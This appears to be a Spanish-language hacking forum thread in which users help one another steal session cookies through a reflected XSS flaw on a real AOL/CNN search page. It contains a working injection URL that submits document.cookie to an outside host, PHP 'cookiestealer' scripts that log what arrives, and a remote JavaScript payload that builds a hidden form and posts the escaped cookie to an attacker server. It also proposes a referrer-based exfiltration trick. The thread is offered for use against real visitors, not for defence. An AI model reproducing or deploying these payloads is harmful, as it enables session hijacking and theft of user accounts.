okay tengo un problema pasando la cookie a mi cookiestealer.php.
El problema que tengo es que no puedo pasar todo el contenido de la cookie, porque la cookie tiene mas de 255 characters y cuando la paso con GET mi cookiestealer.php no recive toda la cookie.
Hay una manera de guardar la cookie en partes con nombres, osea acceder la cookie por sección embes de todo junto.porque no puedo poner todo el contenido de la cookie con un GET command en la url porque hay un limite de 255 characters en la url.
Y sí lo pasas por post?
okay ese es el link
http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ealert%28document.cookie.length%29%3C/script%3E&query=query1
si te fijas la cookie tiene 698 characters,no pasaria toda la cookie con un GET command. Como lo haria con un post, que no hay otra manera de pasar toda la cookie parte a parte.
Hola, puedes utilizar una petición post con xmlhttp desde javascript o insertando un nuevo .js al código desde el xss y manipulas a tu antojo el .js para que pueda enviarte la cookie ya sea en trocitos o serializada.
También puedes inyectar al DOM un formulario para enviar todo atraves de una sola petición post.
Si no sabes que es una petición post te sugiero que leas un manual básico acerca de xss y código html para que puedas aprender como funciona un formulario web.
La otra opción sería que le preguntes directamente a la persona que descubrió el xss:
http://www.xssed.com/mirror/62113/
Si quieres aprender puedes leer estos tutos para que comienzes con lo básico:
http://foro.elhacker.net/nivel_web/diccionario_informatico_sobre_bugs_y_exploits_en_nivel_web_v10-t264007.0.html
http://foro.elhacker.net/desarrollo_web-b7.0/
http://en.wikipedia.org/wiki/POST_%28HTTP%29
http://www.subgurim.net/Articulos/ajax-y-javascript/54/ajax-a-pelo-xmlhttprequest.aspx
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_261109-t244090.0.html
Saludos.
Okay gracias despues regreso voy a escuchar y hacer lo que me dijo WHK
Genial!, si tienes alguna duda con alguna lectura nos avisas y vemos en que te podemos ayudar.
Okay primeramente gracias por tu ayuda en tu primer post.Los links no me ayudaron para decirte la verdad pero me ayudo lo que me dijiste de
"También puedes inyectar al DOM un formulario para enviar todo atraves de una sola petición post."
Eso fue lo que me ayudo mas.
Okay aqui esta mi nuevo link nadamas que ahora tengo otro problema , pero es mejor que antes
http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ealert%28document.forms[0].elements[1].value=document.cookie%29;alert%28document.forms[0].action%20=%20%27http://gotcookie1.orgfree.com/cookiestealer.php%27%29;alert%28document.forms[0].submit%28%29%29%3C/script%3E&query=query1
si te fijas . hice lo que tu me dijiste , cambie 3 cosas.
El action, ha el php de mi cookiestealer.php
Puse la cookie en Query1
y la hice submit.
Pero cuando clickeo en link me dice 'undefined'
y ese es my cookiestealer.php
<?php
$cookie = urldecode($_POST['q']);
$fp = fopen("log.txt", "a");
fwrite($fp, "$cookie \n");
fclose($fp);
?>
Si quieres ahorrar código puedes inyectar esto en formato HTML:
<script src="http://miweb.com/xss.js"></script>
Entonces trabajas sobre archivo de javascript y vas reuniendo variables y vas creando inputs y te envías la petición:
xss.js
try{
payload = '<form name="xss_form" id="xss_form" action="http://miweb.com/xss.php" method="post">';
payload += '<input type="hidden" name="cookie" value="' + escape(document.cookie) + '" />';
payload += '</form>';
document.write(payload);
document.xss_form.submit();
}catch(e){}
Ahora puedes unir todo en un solo archivo php donde si llega una petición post entonces procesa los datos y lo guarda y redirecciona a google y si no llega ninguna peticion post entonces que se muestre el contenido del javascript, así puedes lanzar el xss con la url hacia tu php:
<script src="http://miweb.com/xss.php"></script>
Ahora otra forma sería hacer un document.location hacia '#' + document.cookie y despues haces una segunda redirección hacia tu script y obtienes la cookie desde la referencia :P
Saludos.
estimado WHK como seria un ejemplo de ese ultimo?
ese ultimo era el ejemplo xD
es que me dejo liado esto "Ahora otra forma sería hacer un document.location hacia '#' + document.cookie y despues haces una segunda redirección hacia tu script y obtienes la cookie desde la referencia"
aca les dejo un codigo util
$handle = fopen("log.txt", "w");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;